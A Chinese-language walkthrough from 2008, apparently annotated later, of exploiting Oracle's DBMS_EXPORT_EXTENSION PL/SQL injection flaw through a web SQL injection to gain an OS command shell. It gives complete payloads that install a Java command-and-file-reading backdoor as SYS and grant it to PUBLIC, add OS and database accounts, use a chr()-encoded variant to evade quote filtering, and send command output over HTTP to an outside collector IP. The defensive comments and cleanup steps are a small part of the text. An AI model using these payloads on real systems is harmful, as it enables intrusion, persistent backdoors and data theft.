
实例演示oracle注入获取cmdshell的全过程

以下的演示都是在 web 上的 SQL*Plus 里执行的;在 web 注入时把 select SYS.DBMS_EXPORT_EXTENSION..... 改成
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
的形式即可。(用 'a'|| 是为了让条件恒为真:子查询的返回值——包括 NULL——被拼接到 'a' 后面,结果永远不等于 '1';如果去掉 'a'|| 而子查询返回 NULL,条件就变成 UNKNOWN,页面表现为"假"。)
语句有点长,可能要用 post 提交。
审阅说明:这一整套步骤依赖 SYS 所有的定义者权限包 DBMS_EXPORT_EXTENSION 把第三个参数原样拼进动态 SQL(一个 PL/SQL 注入缺陷,Oracle 已在 2006 年前后的 Critical Patch Update 中修复),因此只对未打补丁、且装有 Oracle JVM 的实例有效。后面创建的 Java 类、PL/SQL 函数和授予 PUBLIC 的权限都是持久化的后门,测试后必须完整清理(原文第 7 步只删除了 LinxRunCMD)。
以下是各个步骤:
) G9 F( s) Y$ e6 g3 b1 s1.创建包
) {& q# m3 `4 J5 z4 `- j3 e通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:5 Y) C* d6 j6 F2 ]) h
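-- Step 1: create the Java helper class as SYS through the DBMS_EXPORT_EXTENSION injection.
--
-- Why this runs as SYS: the third argument of SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES
-- is concatenated unescaped into a statement that the SYS-owned (definer-rights) package
-- executes, so the `"` closes the quoted identifier and everything after
-- `DBMS_OUTPUT".PUT(1);` is executed with SYS privileges. This is a long-fixed flaw
-- (Oracle shipped fixes for it in its 2006 Critical Patch Updates); the walkthrough only
-- works against an unpatched instance that also has the Oracle JVM installed.
--
-- Why PRAGMA AUTONOMOUS_TRANSACTION: DDL implicitly commits and is not allowed from inside
-- a SELECT; the autonomous block gives the injected DDL its own transaction.
--
-- Quote nesting: '' is one quote inside the outer literal, '''' is one quote inside the
-- innermost (DDL) string, '''''''' is one quote inside a string nested in that DDL.
--
-- What the class does: runCMD() spawns `args` via Runtime.exec() with the OS privileges of
-- the Oracle server process and returns its stdout (readLine() results joined with a real
-- newline, i.e. chr(10)); readFile() returns the contents of `filename`. Both catch every
-- exception and return e.toString(), so failures come back as text, not as errors. The class,
-- and the functions built on it in step 3, live in the SYS schema and persist until dropped.
-- (The forum's anti-copy noise that was interleaved with this payload has been removed.)
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)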
------------------------
如果 url 有长度限制,可以把 readFile() 方法去掉(只保留 runCMD),即:
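-- Step 1, short variant for length-limited URLs: same injection as above but the Java
-- class only carries runCMD(). Everything said about the full variant applies: the DDL
-- runs as SYS through the unpatched DBMS_EXPORT_EXTENSION package, the class is created in
-- the SYS schema, runCMD() executes with the OS privileges of the Oracle server process and
-- returns stdout (lines joined with chr(10)) or e.toString() on failure.
-- If you use this variant, also skip the LinxReadFile statements in steps 3, 4 and 6.
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)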
同时把后面步骤中提到的对 readFile()/LinxReadFile 的处理语句去掉。
------------------------------
2.赋 Java 权限(把 java.io.FilePermission <<ALL FILES>> 的 execute 动作授予 PUBLIC:此后数据库里任何能加载 Java 代码的账号都可以启动操作系统进程。这条授权是持久的,第 7 步不会清除它;防守方可在 DBA_JAVA_POLICY 中核对。另外这里只授予了 execute,readFile 用到的 FileReader 还需要 read 动作,能否直接读文件取决于类所属 schema(SYS)已有的权限,需自行验证。)
+ x7 G6 D& d5 L2 l  y  Hselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual5 n0 z- T( O2 V5 F5 d. G& d
3.创建函数(在 SYS schema 下创建调用上述 Java 方法的 PL/SQL 包装函数,后面用 sys.LinxRunCMD / sys.LinxReadFile 引用)
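-- Step 3: PL/SQL call specifications that expose the two Java methods as SQL functions.
-- Both are created as SYS (the injected DDL runs as SYS), hence the sys. prefix used later.
-- LinxRunCMD(p_cmd) -> stdout of the command, or the Java exception text on failure.
-- LinxReadFile(filename) -> file contents, or the exception text.
-- The return type is VARCHAR2: long command output or large files will exceed what a
-- VARCHAR2 can carry in a SQL context and fail or be cut short -- TODO confirm the limit
-- on the target version before relying on it.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
-- Skip this one if the short (runCMD-only) Java class from step 1 was used.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual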
4.赋 public 执行函数的权限(之后任何数据库账号——包括 web 应用使用的低权限账号——都能调用 sys.LinxRunCMD 执行系统命令;这同样是持久的后门,防守方可在 DBA_TAB_PRIVS 中按 grantee='PUBLIC' 且 owner='SYS' 排查)
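-- Step 4: GRANT ALL (for a function this means EXECUTE) on the SYS-owned wrappers to PUBLIC,
-- so the application's own low-privilege database account can call sys.LinxRunCMD /
-- sys.LinxReadFile. From this point every account in the database has OS command execution.
-- These object grants disappear when the functions are dropped (step 7), but they are worth
-- looking for in DBA_TAB_PRIVS (grantee = 'PUBLIC', owner = 'SYS') during a response.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
-- Skip if LinxReadFile was not created.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual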
5.测试上面的几步是否成功(这里要用不带 'a'|| 的形式:对象不存在时子查询返回 NULL,条件为假;带上 'a'|| 或 '11'|| 后条件恒为真,就测不出任何东西)
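-- Step 5: existence checks for the objects created in step 3.
-- These must NOT use the always-true 'a'|| wrapper from the header: the whole point is that
-- the condition depends on the subquery. If the object exists, OBJECT_ID is a number and
-- '1' <> <that number> is true; if it does not, the subquery yields NULL and the condition is
-- UNKNOWN (page shows "false"). The original post had `'1'<>'11'||(` on the first check,
-- which is true whether or not the function exists, so it never detected anything; fixed to
-- match the second check.
-- If the name resolves to more than one object (e.g. a function plus a synonym) the
-- single-row subquery raises an error instead -- restrict on OWNER/OBJECT_TYPE if that happens.
and '1'<>(
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
)
and '1'<>(
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
)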
6.执行命令(命令以 Oracle 服务进程所用的操作系统账号权限运行;示例里的 net user /add 会在数据库主机上留下一个持久的本地账号,实际测试时应优先使用无副作用的命令,并记录、清理所做的改动):
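-- Step 6: run an OS command / read a file through the SYS-owned wrappers, blind form (the page
-- only reveals whether the condition was true; use the union / UTL_HTTP forms to see output).
--
-- The command runs with the OS privileges of the Oracle server process. `net user linx /add`
-- creates a persistent local Windows account on the database host -- prefer a harmless probe
-- during testing and record/clean up anything you create.
-- runCMD() returns the command's stdout; a command that prints nothing returns "", which
-- Oracle treats as NULL, so '1'<>NULL is UNKNOWN and the page shows "false" even though the
-- command did run. A Java exception is returned as text and therefore reads as "true".
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
)
-- readFile(): reads c:/boot.ini as the server's OS account. The step-2 grant only covers the
-- "execute" action, so a security exception is possible here; it comes back via e.toString()
-- and still makes the condition true -- verify the actual content with the union/UTL_HTTP
-- forms before trusting a "true".
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxReadFile('c:/boot.ini') from dual
)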
  
注意 sys.LinxReadFile() / sys.LinxRunCMD() 返回的是 VARCHAR2,不能用 "and 1<>" 代替 "and '1'<>":数字和非数字字符串比较时 Oracle 会尝试把字符串转成数字而抛出 ORA-01722。另外这种布尔盲注只能看到真/假,命令没有输出时函数返回空串,Oracle 视为 NULL,条件为假,看起来像没执行。
如果要查看运行结果可以用 union(注入的 select 列数和类型必须与应用原查询一致,必要时用 NULL 补齐):
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
或者用 UTL_HTTP.request 把结果带外(out-of-band)发到自己的服务器(下面的 211.71.147.3 是作者的接收端,需改成自己的)。这要求数据库服务器能主动向外发起 HTTP 连接,11g 起还受网络 ACL 限制;防守方可据此监控数据库主机的出站连接:
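-- Out-of-band result retrieval: the database server itself issues an HTTP GET to the
-- attacker's collector (211.71.147.3 in the original post -- replace with your own host) with
-- the command output / file contents in the query string. Requires outbound HTTP from the
-- DB host; on 11g and later UTL_HTTP is additionally subject to network ACLs. Blue team:
-- outbound HTTP from a database server to an arbitrary host is itself a strong signal.
--
-- Fix vs. the original post: it used REPLACE(..., '\n', '%0A'). In Oracle SQL '\n' is the
-- two characters backslash + n, not a newline, so it never matched; the Java helper joins
-- lines with a real newline ("\n" in Java source = chr(10)). chr(10) is used here instead.
-- Only space and LF are encoded; any other reserved character in the output ('&', '#',
-- '%', '?', '+', ...) will still corrupt the query string -- use utl_url.escape(..., true)
-- or the base64 approach mentioned below for a complete encoding, and mind URL length limits.
-- `net user aaa /del` deletes a local OS account named aaa (not created anywhere on this page).
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),chr(10),'%0A')) FROM dual
)
-- Same for the file reader (the `a=LinxRunCMD:` label in the URL is just a tag the original
-- author reused; it has no effect on what is sent).
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),chr(10),'%0A')) FROM dual
)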
注意:用 UTL_HTTP.request 时,要用 REPLACE() 把空格、换行符替换掉,否则无法提交 http request。但 Oracle 的字符串字面量 '\n' 是"反斜杠 + n"两个字符,并不是换行;而 Java 代码里追加的 "\n" 是真正的换行符 chr(10),所以原文的 REPLACE(...,'\n','%0A') 实际匹配不到任何东西,应改用 chr(10)(或者用 utl_url.escape 做完整的 URL 编码)。用 utl_encode.base64_encode 也可以(它的输入输出是 RAW,需要配合 utl_raw.cast_to_raw / utl_raw.cast_to_varchar2)。
--------------------
6.内部变化
通过以下命令可以查看 all_objects 表的改变。防守方排查时还应检查 object_type 为 JAVA SOURCE / JAVA CLASS 的对象、DBA_JAVA_POLICY 中授予 PUBLIC 的 Java 权限,以及 DBA_TAB_PRIVS 中 grantee='PUBLIC' 的 SYS 对象:
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'3 D! z! `: |. s
7.删除我们创建的函数(注意原文只删除了 LinxRunCMD;LinxReadFile、Java 源/类 LinxUtil 以及第 2 步授予 PUBLIC 的 Java 权限都还留在库里,必须一并清理,否则就是留给别人的后门)
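-- Step 7: cleanup. As originally posted only LinxRunCMD was dropped; LinxReadFile, the Java
-- source/class "LinxUtil" and the PUBLIC Java permission from step 2 were left behind.
-- The two extra payloads below drop the remaining objects (the PUBLIC object grants from
-- step 4 go away with the objects). Dropping the Java source should also remove the class
-- compiled from it -- re-run the all_objects query from step 6 to confirm nothing is left.
-- The step-2 permission is not a schema object and survives all of this: remove it with
-- dbms_java.revoke_permission / dbms_java.delete_permission (key from DBA_JAVA_POLICY) and
-- re-check DBA_JAVA_POLICY -- TODO confirm the exact call on the target version.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxReadFile  '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop java source "LinxUtil"  '''';END;'';END;--','SYS',0,'1',0) from dual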
====================================================
全文结束。谨以此文赠与我的朋友。
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
测试漏洞的另一方法:
创建 oracle 帐号(这是有副作用的探测:会在库里留下一个密码极易猜到的账号,测完务必执行下面的删除步骤;防守方可按 DBA_USERS.CREATED 和 CREATE USER 的审计记录排查):
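-- Alternative vulnerability check: create a database account as SYS through the same injection.
-- Intrusive probe: it leaves an account with a trivially guessable password (linxsql/linxsql)
-- in the database until the drop step below is run. For responders this is exactly the kind
-- of artefact to hunt for (unexpected rows in DBA_USERS, CREATE USER in the audit trail).
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual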
即(同一条语句全部用 chr() 拼接的等价形式,请求里不出现单引号,可用于应用对引号做了过滤或转义的场合):
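-- Same CREATE USER payload with every string literal rebuilt from chr() so the request
-- contains no single quote (useful when the application filters or escapes quotes).
-- Decoded, the third argument is:
--   DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN
--   EXECUTE IMMEDIATE ''CREATE USER linxsql IDENTIFIED BY linxsql'';END;';END;--
-- Because the literal is now built by concatenation there is one quoting level less: what
-- was '' in the quoted form is a single chr(39) here, and '''' becomes chr(39)||chr(39).
-- The remaining arguments are 'SYS', 0, '1', 0 as in the other payloads.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual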
确定漏洞存在:
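-- Confirm the account was created. USER_ID is numeric, so the bare `1<>(...)` comparison is
-- fine here: an existing user gives a number different from 1 (true); no such user gives NULL
-- (condition UNKNOWN, page shows "false"). Prefix with `and` / the page parameter as in the
-- other steps when injecting it.
1<>(
select user_id from all_users where username='LINXSQL'
)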
给 linxsql 连接权限(CONNECT 角色让这个账号可以直接通过监听器登录,是一个独立于 web 应用的第二落脚点;防守方可在 DBA_ROLE_PRIVS 中核对):
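-- Grant the CONNECT role to the new account so it can log in directly over the listener --
-- a second foothold that is independent of the web application. (What CONNECT includes
-- varies by Oracle version; on recent versions it is essentially CREATE SESSION.)
-- Check DBA_ROLE_PRIVS for unexpected grantees when responding.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual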
删除帐号(测试结束后必须执行):
' Y& M, E6 F; u: B$ z! }6 ^9 e8 d$ [select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
* z! B* K* f8 v2 d& @, sdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual 7 ^& q4 U' n: B
======================
以下方法创建一个可以执行多语句的函数 Linx_query(),执行成功的话返回数值 "1"。但它声明为 authid current_user(调用者权限),里面的 execute immediate 只以调用者的权限运行,可能仅仅是 web 账号的权限,作用似乎不大;而且原文没有给 Linx_query 授 execute 权限,web 账号能否调用 sys.Linx_query 需要自行确认。真的要用的话可以考虑 grant dba 给当前 User——但这是极为显眼且持久的提权,实验环境以外不应这样做:
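-- Create a SYS-owned helper that executes arbitrary PL/SQL/SQL passed as `p` and returns 1.
-- It is declared AUTHID CURRENT_USER, so the EXECUTE IMMEDIATE inside runs with the CALLER's
-- privileges rather than SYS's -- which is why the post finds it of little use from a
-- low-privileged web account. No EXECUTE grant on Linx_query appears on this page, so whether
-- the web account can call sys.Linx_query at all is unverified. Granting DBA to the web user,
-- as the post suggests, is a loud, persistent privilege escalation and belongs in a lab only.
-- Errors raised by `p` propagate (there is no exception handler), so a failed statement
-- shows up as a page error rather than a return value.
1.jsp?id=1 and '1'<>(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
)
-- The original post continues with a second payload that is truncated mid-statement and, as
-- printed, is also missing the `<>` operator and the `"` after DBMS_OUTPUT:
--   ) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
-- It is not usable in that form and is kept here only for reference.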
